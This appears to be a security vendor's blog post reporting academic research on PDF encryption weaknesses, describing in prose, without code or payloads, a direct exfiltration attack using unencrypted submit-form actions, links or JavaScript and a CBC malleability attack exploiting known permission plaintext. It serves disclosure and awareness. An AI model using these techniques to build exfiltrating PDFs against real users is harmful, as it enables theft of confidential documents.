According to the file format’s specifications, PDF supports encryption, using the AES algorithm with Cipher Block Chaining encryption mode. Therefore — at least, in theory — whoever encrypts a PDF file can be sure that only someone who has the password can see what’s in the file. Continuing the study of PDF security, a team of researchers from several German universities tested how reliable the encryption implementation in this format is. Fabian Ising of Münster University of Applied Sciences presented their conclusions — and they were disappointing.
In theory, companies use encrypted PDFs to transfer data through an unsecured or untrusted channel — for example, to upload a file to cloud storage that many people have access to. The researchers were looking for a way to modify the source file such that when the password was entered, the information in the PDF was sent to a third party, but without making any changes visible to the recipient.
The researchers developed two attack concepts that let them give a third party access to the encrypted content. Furthermore, the first attack (direct exfiltration) does not require any special cryptography skills — only an understanding of the PDF format specifications. The researchers called it “hacking cryptography without touching cryptography.” The second attack, called a malleability attack, is more complicated and requires an understanding of Cipher Block Chaining mode.
Who uses encrypted PDFs, and why?
Businesses find many uses for encrypted PDFs.
- Banks use them for confidentiality when exchanging documents with customers.
- MFPs may accept scanned documents by e-mail, password-protecting PDFs if the sender selects the “in encrypted form” option.
- Medical diagnostic devices use secure PDFs to send test results to patients or medics.
- Government agencies such as the US Department of Justice accept incoming documents as encrypted PDFs.
A number of e-mail application plugins provide the ability to send a document as an encrypted PDF, so a demand for the option clearly exists.
Direct exfiltration attack
Encrypting a PDF file encrypts the content only (i.e., objects in the file, which are characterized as either strings or streams). The remaining objects, determining the structure of the document, remain unencrypted. In other words, you can still find out the number and size of pages, objects, and links. That information should not be left to potential attackers, who can use it to engineer a way to circumvent the encryption.
The researchers wondered first if they could add their own information to the file — in theory that could allow them to invent an exfiltration channel. They learned from the format documentation that PDFs allow granular control over encryption such that, for example, you can encrypt only objects of type “string” or only objects of type “stream,” leaving other content unencrypted.
Moreover, no integrity checks are implemented, so if you add something to an encrypted document, users won’t be alerted. That “something” might include a submit-form action function, which means you could embed a form in a PDF file that sends data — for example, the entire contents of the document — to a third party. The function can be tied to an action such as opening the document, too.
The above is simply one example of exfiltration, but options abound. Attackers might place a simple link to their site with the entire contents of the file added to the URL. Or they could use JavaScript to send the decrypted contents anywhere. Of course, some PDF readers double-check with the user before communicating with a website, but not all of them — and not every user will think before allowing it.
Malleability attack
The second attack on PDF encryption employs a known drawback of Cipher Block Chaining (CBC) mode, which lacks integrity control. The essence of this well-known attack is that an attacker who knows part of the plain-text information that was encrypted can change the contents of a block.
However, according to the PDF format specifications, each time content in a PDF file is encrypted, it also encrypts different permissions (for example, giving the author the ability to edit the document and denying a simple reader the ability to do so). In theory, that was done to prevent attackers from tampering with permissions, which are encrypted with the same AES key as the rest of the document.
At the same time, those permissions are also stored in the file in unencrypted form. That means by default attackers know what 12 bytes of the file are, and as a result, they can tamper with Cipher Block Chaining to target and manipulate encrypted data, for example, adding the data exfiltration mechanism to the encrypted file to send the contents of the file to a third-party site.
Results
The researchers tested their methods on 23 PDF readers and 4 browsers. They found each of them at least partially vulnerable to at least one of these attacks.
Unfortunately, no client-side solution can fully mitigate the format’s weakness. It is not possible to block all exfiltration channels without crippling the format. The researchers contacted software developers and reported the problems, and some of the companies, including Apple, tried to help by emphasizing notifications that the file was accessing a third-party site. Others said they’d tried but couldn’t “fix the unfixable.”
Our recommendation if you need to transmit confidential data is to use an alternative method of securing that information. For example, you can use our solutions to create encrypted containers.